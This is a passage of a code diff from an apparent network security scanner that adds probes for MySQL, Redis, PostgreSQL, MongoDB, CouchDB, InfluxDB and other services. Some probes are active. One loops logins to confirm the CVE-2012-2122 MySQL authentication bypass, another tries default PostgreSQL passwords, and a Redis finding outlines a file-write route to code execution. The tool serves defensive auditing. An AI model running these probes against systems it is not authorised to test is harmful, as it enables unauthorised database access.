_ in range(attempts): + # Read handshake + data = sock.recv(512) + if not data or len(data) < 5: + break + pkt_payload = data[4:] + if not pkt_payload or pkt_payload[0] != 0x0a: + break + + # Extract salt + parts = pkt_payload[1:].split(b'\x00', 1) + rest = parts[1] if len(parts) > 1 else b'' + if len(rest) < 13: + break + salt1 = rest[5:13] + salt2 = rest[28:40].rstrip(b'\x00') if len(rest) >= 28 else b'' + salt = salt1 + salt2 + + # Auth with random password + rand_pass = random.randbytes(20) + sha1_pass = hashlib.sha1(rand_pass).digest() + sha1_sha1 = hashlib.sha1(sha1_pass).digest() + sha1_salt = hashlib.sha1(salt + sha1_sha1).digest() + auth_data = bytes(a ^ b for a, b in zip(sha1_pass, sha1_salt)) + + client_flags = struct.pack('= 5 and resp[4] == 0x00: + sock.close() + return Finding( + severity=Severity.CRITICAL, + title=f"MySQL authentication bypass confirmed 
(CVE-2012-2122)", + description=f"MySQL {version_str} on {target}:{port} accepted login with a random password " + "due to CVE-2012-2122 memcmp truncation bug. Any attacker can gain root access.", + evidence=f"Auth succeeded with random password on attempt (version {version_str})", + remediation="Upgrade MySQL to at least 5.1.63 / 5.5.25 / MariaDB 5.5.23.", + owasp_id="A07:2021", + cwe_id="CWE-305", + confidence="certain", + ) + + # If error packet, server closes connection — reconnect + if resp and len(resp) >= 5 and resp[4] == 0xFF: + sock.close() + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + sock.close() + except Exception: + pass + return None + + # SAFETY: Read-only commands only. NEVER add CONFIG SET, SLAVEOF, MODULE LOAD, EVAL, DEBUG. + def _service_info_redis(self, target, port): # default port: 6379 + """ + Deep Redis probe: auth check, version, config readability, data size, client list. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
+ """ + findings, raw = [], {"version": None, "os": None, "config_writable": False} + sock = self._redis_connect(target, port) + if not sock: + return probe_error(target, port, "Redis", Exception("connection failed")) + + auth_findings = self._redis_check_auth(sock, raw) + if not auth_findings: + # NOAUTH response — requires auth, stop here + sock.close() + return probe_result( + raw_data=raw, + findings=[Finding(Severity.INFO, "Redis requires authentication", "PING returned NOAUTH.")], + ) + + findings += auth_findings + findings += self._redis_check_info(sock, raw) + findings += self._redis_check_config(sock, raw) + findings += self._redis_check_data(sock, raw) + findings += self._redis_check_clients(sock, raw) + findings += self._redis_check_persistence(sock, raw) + + # CVE check + if raw["version"]: + findings += check_cves("redis", raw["version"]) + + sock.close() + return probe_result(raw_data=raw, findings=findings) + + def _redis_connect(self, target, port): + """Open a TCP socket to Redis.""" + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + return sock + except Exception as e: + self.P(f"Redis connect failed on {target}:{port}: {e}", color='y') + return None + + def _redis_cmd(self, sock, cmd): + """Send an inline Redis command and return the response string.""" + try: + sock.sendall(f"{cmd}\r\n".encode()) + data = sock.recv(4096).decode('utf-8', errors='ignore') + return data + except Exception: + return "" + + def _redis_check_auth(self, sock, raw): + """PING to check if auth is required. 
Returns findings if no auth, empty list if NOAUTH.""" + resp = self._redis_cmd(sock, "PING") + if resp.startswith("+PONG"): + return [Finding( + severity=Severity.CRITICAL, + title="Redis unauthenticated access", + description="Redis responded to PING without authentication.", + evidence=f"Response: {resp.strip()[:80]}", + remediation="Set a strong password via requirepass in redis.conf.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )] + if "-NOAUTH" in resp.upper(): + return [] # signal: auth required + return [Finding( + severity=Severity.LOW, + title="Redis unusual PING response", + description=f"Unexpected response: {resp.strip()[:80]}", + confidence="tentative", + )] + + def _redis_check_info(self, sock, raw): + """Extract version and OS from INFO server.""" + findings = [] + resp = self._redis_cmd(sock, "INFO server") + if resp.startswith("-"): + return findings + uptime_seconds = None + for line in resp.split("\r\n"): + if line.startswith("redis_version:"): + raw["version"] = line.split(":", 1)[1].strip() + elif line.startswith("os:"): + raw["os"] = line.split(":", 1)[1].strip() + elif line.startswith("uptime_in_seconds:"): + try: + uptime_seconds = int(line.split(":", 1)[1].strip()) + raw["uptime_seconds"] = uptime_seconds + except (ValueError, IndexError): + pass + if raw["os"]: + self._emit_metadata("os_claims", "redis", raw["os"]) + if raw["version"]: + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis version disclosed: {raw['version']}", + description=f"Redis {raw['version']} on {raw['os'] or 'unknown OS'}.", + evidence=f"version={raw['version']}, os={raw['os']}", + remediation="Restrict INFO command access or rename it.", + confidence="certain", + )) + if uptime_seconds is not None and uptime_seconds < 60: + findings.append(Finding( + severity=Severity.INFO, + title=f"Redis uptime <60s ({uptime_seconds}s) — possible container restart", + description="Very low uptime may indicate a recently restarted container 
or ephemeral instance.", + evidence=f"uptime_in_seconds={uptime_seconds}", + remediation="Investigate if the service is being automatically restarted.", + confidence="tentative", + )) + return findings + + def _redis_check_config(self, sock, raw): + """CONFIG GET dir — if accessible, it's an RCE vector.""" + findings = [] + resp = self._redis_cmd(sock, "CONFIG GET dir") + if resp.startswith("-"): + return findings # blocked, good + raw["config_writable"] = True + findings.append(Finding( + severity=Severity.CRITICAL, + title="Redis CONFIG command accessible (RCE vector)", + description="CONFIG GET is accessible, allowing attackers to write arbitrary files " + "via CONFIG SET dir / CONFIG SET dbfilename + SAVE.", + evidence=f"CONFIG GET dir response: {resp.strip()[:120]}", + remediation="Rename or disable CONFIG via rename-command in redis.conf.", + owasp_id="A05:2021", + cwe_id="CWE-94", + confidence="certain", + )) + return findings + + def _redis_check_data(self, sock, raw): + """DBSIZE — report if data is present.""" + findings = [] + resp = self._redis_cmd(sock, "DBSIZE") + if resp.startswith(":"): + try: + count = int(resp.strip().lstrip(":")) + raw["db_size"] = count + if count > 0: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Redis database contains {count} keys", + description="Unauthenticated access to a Redis instance with live data.", + evidence=f"DBSIZE={count}", + remediation="Enable authentication and restrict network access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except ValueError: + pass + return findings + + def _redis_check_clients(self, sock, raw): + """CLIENT LIST — extract connected client IPs.""" + findings = [] + resp = self._redis_cmd(sock, "CLIENT LIST") + if resp.startswith("-"): + return findings + ips = set() + for line in resp.split("\n"): + for part in line.split(): + if part.startswith("addr="): + ip_port = part.split("=", 1)[1] + ip = ip_port.rsplit(":", 1)[0] + ips.add(ip) + 
if ips: + raw["connected_clients"] = list(ips) + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis client IPs disclosed ({len(ips)} clients)", + description=f"CLIENT LIST reveals connected IPs: {', '.join(sorted(ips)[:5])}", + evidence=f"IPs: {', '.join(sorted(ips)[:10])}", + remediation="Rename or disable CLIENT command.", + confidence="certain", + )) + return findings + + def _redis_check_persistence(self, sock, raw): + """Check INFO persistence for missing or stale RDB saves.""" + findings = [] + resp = self._redis_cmd(sock, "INFO persistence") + if resp.startswith("-"): + return findings + import time as _time + for line in resp.split("\r\n"): + if line.startswith("rdb_last_bgsave_time:"): + try: + ts = int(line.split(":", 1)[1].strip()) + if ts == 0: + findings.append(Finding( + severity=Severity.LOW, + title="Redis has never performed an RDB save", + description="rdb_last_bgsave_time is 0, meaning no background save has ever been performed. " + "This may indicate a cache-only instance with persistence disabled, or an ephemeral deployment.", + evidence="rdb_last_bgsave_time=0", + remediation="Verify whether RDB persistence is intentionally disabled; if not, configure BGSAVE.", + cwe_id="CWE-345", + confidence="tentative", + )) + elif (_time.time() - ts) > 365 * 86400: + age_days = int((_time.time() - ts) / 86400) + findings.append(Finding( + severity=Severity.LOW, + title=f"Redis RDB save is stale ({age_days} days old)", + description="The last RDB background save timestamp is over 1 year old. 
" + "This may indicate disabled persistence, a long-running cache-only instance, or stale data.", + evidence=f"rdb_last_bgsave_time={ts}, age={age_days}d", + remediation="Verify persistence configuration; stale saves may indicate data loss risk.", + cwe_id="CWE-345", + confidence="tentative", + )) + except (ValueError, IndexError): + pass + break + return findings + + + def _service_info_mssql(self, target, port): # default port: 1433 + """ + Send a TDS prelogin probe to expose SQL Server version data. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + prelogin = bytes.fromhex( + "1201001600000000000000000000000000000000000000000000000000000000" + ) + sock.sendall(prelogin) + data = sock.recv(256) + if data: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + raw["banner"] = f"MSSQL prelogin response: {readable.strip()[:80]}" + findings.append(Finding( + severity=Severity.MEDIUM, + title="MSSQL prelogin handshake succeeded", + description=f"SQL Server on {target}:{port} responds to TDS prelogin, " + "exposing version metadata and confirming the service is reachable.", + evidence=f"Prelogin response: {readable.strip()[:80]}", + remediation="Restrict SQL Server access to trusted networks; use firewall rules.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "MSSQL", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_postgresql(self, target, port): # default port: 5432 + """ + Probe PostgreSQL authentication method and extract server version. + + Sends a v3 StartupMessage for user 'postgres'. 
The server replies with + an authentication request (type 'R') optionally followed by ParameterStatus + messages (type 'S') that include ``server_version``. + + Auth codes: + 0 = AuthenticationOk (trust auth) → CRITICAL + 3 = CleartextPassword → MEDIUM + 5 = MD5Password → INFO (adequate, prefer SCRAM) + 10 = SASL (SCRAM-SHA-256) → INFO (strong) + """ + findings = [] + raw = {"auth_type": None, "version": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + payload = b'user\x00postgres\x00database\x00postgres\x00\x00' + startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload + sock.sendall(startup) + # Read enough to get auth response + parameter status messages + data = b"" + try: + while len(data) < 4096: + chunk = sock.recv(4096) + if not chunk: + break + data += chunk + # Stop after we see auth request — parameters come after for trust auth + # but for password auth the server sends R then waits. 
+ if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + if auth_code != 0: + break # Server wants a password — no more data coming + except (socket.timeout, OSError): + pass + sock.close() + + # --- Extract version from ParameterStatus ('S') messages --- + # Format: 'S' + int32 length + key\0 + value\0 + pg_version = None + pos = 0 + while pos < len(data) - 5: + msg_type = data[pos:pos+1] + if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): + break + msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] + msg_end = pos + 1 + msg_len + if msg_type == b'S' and msg_end <= len(data): + kv = data[pos+5:msg_end] + parts = kv.split(b'\x00') + if len(parts) >= 2: + key = parts[0].decode('utf-8', errors='ignore') + val = parts[1].decode('utf-8', errors='ignore') + if key == 'server_version': + pg_version = val + raw["version"] = pg_version + pos = msg_end + if pos >= len(data): + break + + # --- Parse auth response --- + if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + raw["auth_type"] = auth_code + if auth_code == 0: + findings.append(Finding( + severity=Severity.CRITICAL, + title="PostgreSQL trust authentication (no password)", + description=f"PostgreSQL on {target}:{port} accepts connections without any password (auth code 0).", + evidence=f"Auth response code: {auth_code}", + remediation="Configure pg_hba.conf to require password or SCRAM authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + elif auth_code == 3: + findings.append(Finding( + severity=Severity.MEDIUM, + title="PostgreSQL cleartext password authentication", + description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", + evidence=f"Auth response code: {auth_code}", + remediation="Switch to SCRAM-SHA-256 authentication in pg_hba.conf.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + elif auth_code == 5: + findings.append(Finding( + 
severity=Severity.INFO, + title="PostgreSQL MD5 authentication", + description="MD5 password auth is adequate but SCRAM-SHA-256 is preferred.", + evidence=f"Auth response code: {auth_code}", + remediation="Consider upgrading to SCRAM-SHA-256.", + confidence="certain", + )) + elif auth_code == 10: + findings.append(Finding( + severity=Severity.INFO, + title="PostgreSQL SASL/SCRAM authentication", + description="Strong authentication (SCRAM-SHA-256) is in use.", + evidence=f"Auth response code: {auth_code}", + confidence="certain", + )) + elif b'AuthenticationCleartextPassword' in data: + raw["auth_type"] = "cleartext_text" + findings.append(Finding( + severity=Severity.MEDIUM, + title="PostgreSQL cleartext password authentication", + description=f"PostgreSQL on {target}:{port} requests cleartext passwords.", + evidence="Text response contained AuthenticationCleartextPassword", + remediation="Switch to SCRAM-SHA-256 authentication.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="firm", + )) + elif b'AuthenticationOk' in data: + raw["auth_type"] = "ok_text" + findings.append(Finding( + severity=Severity.CRITICAL, + title="PostgreSQL trust authentication (no password)", + description=f"PostgreSQL on {target}:{port} accepted connection without authentication.", + evidence="Text response contained AuthenticationOk", + remediation="Configure pg_hba.conf to require password authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="firm", + )) + + # --- Version disclosure --- + if pg_version: + findings.append(Finding( + severity=Severity.LOW, + title=f"PostgreSQL version disclosed: {pg_version}", + description=f"PostgreSQL on {target}:{port} reports version {pg_version}.", + evidence=f"server_version parameter: {pg_version}", + remediation="Restrict network access to the PostgreSQL port.", + cwe_id="CWE-200", + confidence="certain", + )) + # Extract numeric version for CVE matching + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', pg_version) + 
if ver_match: + for f in check_cves("postgresql", ver_match.group(1)): + findings.append(f) + + if not findings: + findings.append(Finding(Severity.INFO, "PostgreSQL probe completed", "No auth weakness detected.")) + except Exception as e: + return probe_error(target, port, "PostgreSQL", e) + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_postgresql_creds(self, target, port): # default port: 5432 + """ + PostgreSQL default credential testing (opt-in via active_auth feature group). + + Attempts cleartext password auth with common defaults. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"tested_credentials": 0, "accepted_credentials": []} + creds = [("postgres", ""), ("postgres", "postgres"), ("postgres", "password")] + + for username, password in creds: + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + payload = f'user\x00{username}\x00database\x00postgres\x00\x00'.encode() + startup = struct.pack('!I', len(payload) + 8) + struct.pack('!I', 196608) + payload + sock.sendall(startup) + data = sock.recv(128) + + if len(data) >= 9 and data[0:1] == b'R': + auth_code = struct.unpack('!I', data[5:9])[0] + if auth_code == 0: + cred_str = f"{username}:(empty)" if not password else f"{username}:{password}" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL trust auth for {username}", + description=f"No password required for user {username}.", + evidence=f"Auth code 0 for {cred_str}", + remediation="Configure pg_hba.conf to require authentication.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + elif auth_code == 3: + # Send cleartext password + pwd_bytes = password.encode() + b'\x00' + pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + 
pwd_bytes + sock.sendall(pwd_msg) + resp = sock.recv(4096) + if resp and resp[0:1] == b'R' and len(resp) >= 9: + result_code = struct.unpack('!I', resp[5:9])[0] + if result_code == 0: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL default credential accepted: {cred_str}", + description=f"Cleartext password auth accepted for {cred_str}.", + evidence=f"Auth OK for {cred_str}", + remediation="Change default passwords.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + findings += self._pg_extract_version_findings(resp) + elif auth_code == 5 and len(data) >= 13: + # MD5 auth: server sends 4-byte salt at bytes 9:13 + import hashlib + salt = data[9:13] + inner = hashlib.md5(password.encode() + username.encode()).hexdigest() + outer = 'md5' + hashlib.md5(inner.encode() + salt).hexdigest() + pwd_bytes = outer.encode() + b'\x00' + pwd_msg = b'p' + struct.pack('!I', len(pwd_bytes) + 4) + pwd_bytes + sock.sendall(pwd_msg) + resp = sock.recv(4096) + if resp and resp[0:1] == b'R' and len(resp) >= 9: + result_code = struct.unpack('!I', resp[5:9])[0] + if result_code == 0: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted_credentials"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"PostgreSQL default credential accepted: {cred_str}", + description=f"MD5 password auth accepted for {cred_str}.", + evidence=f"Auth OK for {cred_str}", + remediation="Change default passwords.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + findings += self._pg_extract_version_findings(resp) + raw["tested_credentials"] += 1 + sock.close() + except Exception: + continue + + if not findings: + findings.append(Finding( + severity=Severity.INFO, + title="PostgreSQL default credentials rejected", + description=f"Tested 
{raw['tested_credentials']} credential pairs.", + confidence="certain", + )) + + return probe_result(raw_data=raw, findings=findings) + + def _pg_extract_version_findings(self, data): + """Parse ParameterStatus messages after PG auth success for version + CVEs.""" + findings = [] + pos = 0 + while pos < len(data) - 5: + msg_type = data[pos:pos+1] + if msg_type not in (b'R', b'S', b'K', b'Z', b'E', b'N'): + break + msg_len = struct.unpack('!I', data[pos+1:pos+5])[0] + msg_end = pos + 1 + msg_len + if msg_type == b'S' and msg_end <= len(data): + kv = data[pos+5:msg_end] + parts = kv.split(b'\x00') + if len(parts) >= 2: + key = parts[0].decode('utf-8', errors='ignore') + val = parts[1].decode('utf-8', errors='ignore') + if key == 'server_version': + findings.append(Finding( + severity=Severity.LOW, + title=f"PostgreSQL version disclosed: {val}", + description=f"PostgreSQL reports version {val} (via authenticated session).", + evidence=f"server_version parameter: {val}", + remediation="Restrict network access to the PostgreSQL port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', val) + if ver_match: + findings += check_cves("postgresql", ver_match.group(1)) + break + pos = msg_end + if pos >= len(data): + break + return findings + + def _service_info_memcached(self, target, port): # default port: 11211 + """ + Issue Memcached stats command to detect unauthenticated access. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
+ """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + + # Extract version + sock.sendall(b'version\r\n') + ver_data = sock.recv(64).decode("utf-8", errors="replace").strip() + ver_match = _re.match(r'VERSION\s+(\d+(?:\.\d+)+)', ver_data) + if ver_match: + raw["version"] = ver_match.group(1) + findings.append(Finding( + severity=Severity.LOW, + title=f"Memcached version disclosed: {raw['version']}", + description=f"Memcached on {target}:{port} reveals version via VERSION command.", + evidence=f"VERSION {raw['version']}", + remediation="Restrict access to memcached to trusted networks.", + cwe_id="CWE-200", + confidence="certain", + )) + findings += check_cves("memcached", raw["version"]) + + sock.sendall(b'stats\r\n') + data = sock.recv(128) + if data.startswith(b'STAT'): + raw["banner"] = data.decode("utf-8", errors="replace").strip()[:120] + findings.append(Finding( + severity=Severity.HIGH, + title="Memcached stats accessible without authentication", + description=f"Memcached on {target}:{port} responds to stats without authentication, " + "exposing cache metadata and enabling cache poisoning or data exfiltration.", + evidence=f"stats command returned: {raw['banner'][:80]}", + remediation="Bind Memcached to localhost or use SASL authentication; restrict network access.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + else: + raw["banner"] = "Memcached port open" + findings.append(Finding( + severity=Severity.INFO, + title="Memcached port open", + description=f"Memcached port {port} is open on {target} but stats command was not accepted.", + evidence=f"Response: {data[:60].decode('utf-8', errors='replace')}", + confidence="firm", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "Memcached", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_mongodb(self, target, 
port): # default port: 27017 + """ + Attempt MongoDB isMaster + buildInfo to detect unauthenticated access + and extract the server version for CVE matching. + """ + findings = [] + raw = {"banner": None, "version": None} + try: + # --- Pass 1: isMaster --- + is_master = False + data = self._mongodb_query(target, port, b'isMaster') + if data and (b'ismaster' in data or b'isMaster' in data): + is_master = True + + if is_master: + raw["banner"] = "MongoDB isMaster response" + findings.append(Finding( + severity=Severity.CRITICAL, + title="MongoDB unauthenticated access (isMaster responded)", + description=f"MongoDB on {target}:{port} accepts commands without authentication, " + "allowing full database read/write access.", + evidence="isMaster command succeeded without credentials.", + remediation="Enable MongoDB authentication (--auth) and bind to localhost or trusted networks.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + # --- Pass 2: buildInfo (for version) --- + build_data = self._mongodb_query(target, port, b'buildInfo') + mongo_version = self._mongodb_extract_bson_string(build_data, b'version') + if mongo_version: + raw["version"] = mongo_version + findings.append(Finding( + severity=Severity.LOW, + title=f"MongoDB version disclosed: {mongo_version}", + description=f"MongoDB on {target}:{port} reports version {mongo_version}.", + evidence=f"buildInfo version: {mongo_version}", + remediation="Restrict network access to the MongoDB port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', mongo_version) + if ver_match: + for f in check_cves("mongodb", ver_match.group(1)): + findings.append(f) + + except Exception as e: + return probe_error(target, port, "MongoDB", e) + return probe_result(raw_data=raw, findings=findings) + + @staticmethod + def _mongodb_query(target, port, command_name): + """Send a MongoDB OP_QUERY command and return the raw response bytes.""" + sock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + # Build BSON: {: 1} + field = b'\x10' + command_name + b'\x00' + struct.pack(' len(data): + return None + str_len = struct.unpack(' len(data): + return None + return data[str_start+4:str_start+4+str_len-1].decode('utf-8', errors='ignore') + + + + # ── CouchDB ────────────────────────────────────────────────────── + + def _service_info_couchdb(self, target, port): # default port: 5984 + """ + Probe Apache CouchDB HTTP API for unauthenticated access, admin panel, + database listing, and version-based CVE matching. + """ + findings, raw = [], {"version": None} + base_url = f"http://{target}:{port}" + + # 1. Root endpoint — identifies CouchDB and extracts version + try: + resp = requests.get(base_url, timeout=3) + if not resp.ok: + return None + data = resp.json() + if "couchdb" not in str(data).lower(): + return None # Not CouchDB + raw["version"] = data.get("version") + raw["vendor"] = data.get("vendor", {}).get("name") if isinstance(data.get("vendor"), dict) else None + except Exception: + return None + + if raw["version"]: + findings.append(Finding( + severity=Severity.LOW, + title=f"CouchDB version disclosed: {raw['version']}", + description=f"CouchDB on {target}:{port} reports version {raw['version']}.", + evidence=f"GET / → version={raw['version']}", + remediation="Restrict network access to the CouchDB port.", + cwe_id="CWE-200", + confidence="certain", + )) + ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', raw["version"]) + if ver_match: + findings += check_cves("couchdb", ver_match.group(1)) + + # 2. 
Database listing — unauthenticated access to /_all_dbs + try: + resp = requests.get(f"{base_url}/_all_dbs", timeout=3) + if resp.ok: + dbs = resp.json() + if isinstance(dbs, list): + raw["databases"] = dbs + user_dbs = [d for d in dbs if not d.startswith("_")] + findings.append(Finding( + severity=Severity.CRITICAL if user_dbs else Severity.HIGH, + title=f"CouchDB unauthenticated database listing ({len(dbs)} databases)", + description=f"/_all_dbs accessible without credentials. " + f"{'User databases exposed: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only system databases found.'}", + evidence=f"Databases: {', '.join(dbs[:10])}" + (f"... (+{len(dbs)-10} more)" if len(dbs) > 10 else ""), + remediation="Enable CouchDB authentication via [admins] section in local.ini.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + + # 3. Admin panel (Fauxton) accessibility + try: + resp = requests.get(f"{base_url}/_utils/", timeout=3, allow_redirects=True) + if resp.ok and ("fauxton" in resp.text.lower() or "couchdb" in resp.text.lower()): + findings.append(Finding( + severity=Severity.HIGH, + title="CouchDB admin panel (Fauxton) accessible", + description=f"/_utils/ on {target}:{port} serves the admin web interface.", + evidence=f"GET /_utils/ returned {resp.status_code}, content-length={len(resp.text)}", + remediation="Restrict access to /_utils via reverse proxy or bind to localhost.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + + # 4. 
# Config endpoint — critical if accessible
        try:
            resp = requests.get(f"{base_url}/_node/_local/_config", timeout=3)
            # A JSON body (leading "{") distinguishes the real config dump from an error page.
            if resp.ok and resp.text.startswith("{"):
                findings.append(Finding(
                    severity=Severity.CRITICAL,
                    title="CouchDB configuration exposed without authentication",
                    description="/_node/_local/_config returns full server configuration including credentials.",
                    evidence=f"GET /_node/_local/_config returned {resp.status_code}",
                    remediation="Enable admin authentication immediately.",
                    owasp_id="A01:2021",
                    cwe_id="CWE-284",
                    confidence="certain",
                ))
        except Exception:
            pass

        if not findings:
            findings.append(Finding(Severity.INFO, "CouchDB probe clean", "No issues detected."))
        return probe_result(raw_data=raw, findings=findings)

    # ── InfluxDB ────────────────────────────────────────────────────

    def _service_info_influxdb(self, target, port):  # default port: 8086
        """
        Probe InfluxDB HTTP API for version disclosure, unauthenticated access,
        and database listing.

        Returns None when the service does not identify itself as InfluxDB
        (missing X-Influxdb-Version header or unreachable /ping endpoint);
        otherwise returns structured findings via probe_result().
        """
        findings, raw = [], {"version": None}
        base_url = f"http://{target}:{port}"

        # 1. Ping — extract version from X-Influxdb-Version header
        try:
            resp = requests.get(f"{base_url}/ping", timeout=3)
            version = resp.headers.get("X-Influxdb-Version")
            if not version:
                return None  # Not InfluxDB
            raw["version"] = version
            findings.append(Finding(
                severity=Severity.LOW,
                title=f"InfluxDB version disclosed: {version}",
                description=f"InfluxDB on {target}:{port} reports version {version}.",
                evidence=f"X-Influxdb-Version: {version}",
                remediation="Restrict network access to the InfluxDB port.",
                cwe_id="CWE-200",
                confidence="certain",
            ))
            ver_match = _re.match(r'(\d+\.\d+(?:\.\d+)?)', version)
            if ver_match:
                findings += check_cves("influxdb", ver_match.group(1))
        except Exception:
            # NOTE(review): any transport error is treated as "not InfluxDB" here — confirm intended.
            return None

        # 2. Unauthenticated database listing
        try:
            resp = requests.get(f"{base_url}/query", params={"q": "SHOW DATABASES"}, timeout=3)
            if resp.ok:
                data = resp.json()
                results = data.get("results", [])
                if results and not results[0].get("error"):
                    series = results[0].get("series", [])
                    db_names = []
                    for s in series:
                        for row in s.get("values", []):
                            if row:
                                db_names.append(row[0])
                    raw["databases"] = db_names
                    user_dbs = [d for d in db_names if d not in ("_internal",)]
                    findings.append(Finding(
                        severity=Severity.CRITICAL if user_dbs else Severity.HIGH,
                        title=f"InfluxDB unauthenticated access ({len(db_names)} databases)",
                        description=f"SHOW DATABASES succeeded without credentials. "
                                    f"{'User databases: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only internal databases found.'}",
                        evidence=f"Databases: {', '.join(db_names[:10])}",
                        remediation="Enable InfluxDB authentication in the configuration ([http] auth-enabled = true).",
                        owasp_id="A07:2021",
                        cwe_id="CWE-287",
                        confidence="certain",
                    ))
                elif results and results[0].get("error"):
                    # Auth required — good
                    findings.append(Finding(
                        severity=Severity.INFO,
                        title="InfluxDB authentication enforced",
                        description="SHOW DATABASES rejected without credentials.",
                        evidence=f"Error: {results[0]['error'][:80]}",
                        confidence="certain",
                    ))
        except Exception:
            pass

        # 3. Debug endpoint exposure
        try:
            resp = requests.get(f"{base_url}/debug/vars", timeout=3)
            if resp.ok and "memstats" in resp.text:
                findings.append(Finding(
                    severity=Severity.MEDIUM,
                    title="InfluxDB debug endpoint exposed (/debug/vars)",
                    description="Go runtime debug variables accessible, leaking memory stats and internal state.",
                    evidence=f"GET /debug/vars returned {resp.status_code}",
                    remediation="Disable or restrict access to debug endpoints.",
                    owasp_id="A05:2021",
                    cwe_id="CWE-200",
                    confidence="certain",
                ))
        except Exception:
            pass

        if not findings:
            findings.append(Finding(Severity.INFO, "InfluxDB probe clean", "No issues detected."))
        return probe_result(raw_data=raw, findings=findings)
diff --git a/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py b/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py
new file mode 100644
index 00000000..7a39f359
--- /dev/null
+++ b/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py
@@ -0,0 +1,2024 @@
import random
import re as _re
import socket
import struct

import requests

from ...findings import Finding, Severity, probe_result, probe_error
from ...cve_db import check_cves
from ._base import _ServiceProbeBase


class _ServiceInfraMixin(_ServiceProbeBase):
    """RDP, VNC, SNMP, DNS, SMB, WINS, Modbus and Elasticsearch probes."""

    def _service_info_rdp(self, target, port):  # default port: 3389
        """
        Verify reachability of RDP services without full negotiation.

        Parameters
        ----------
        target : str
            Hostname or IP address.
        port : int
            Port being probed.

        Returns
        -------
        dict
            Structured findings.
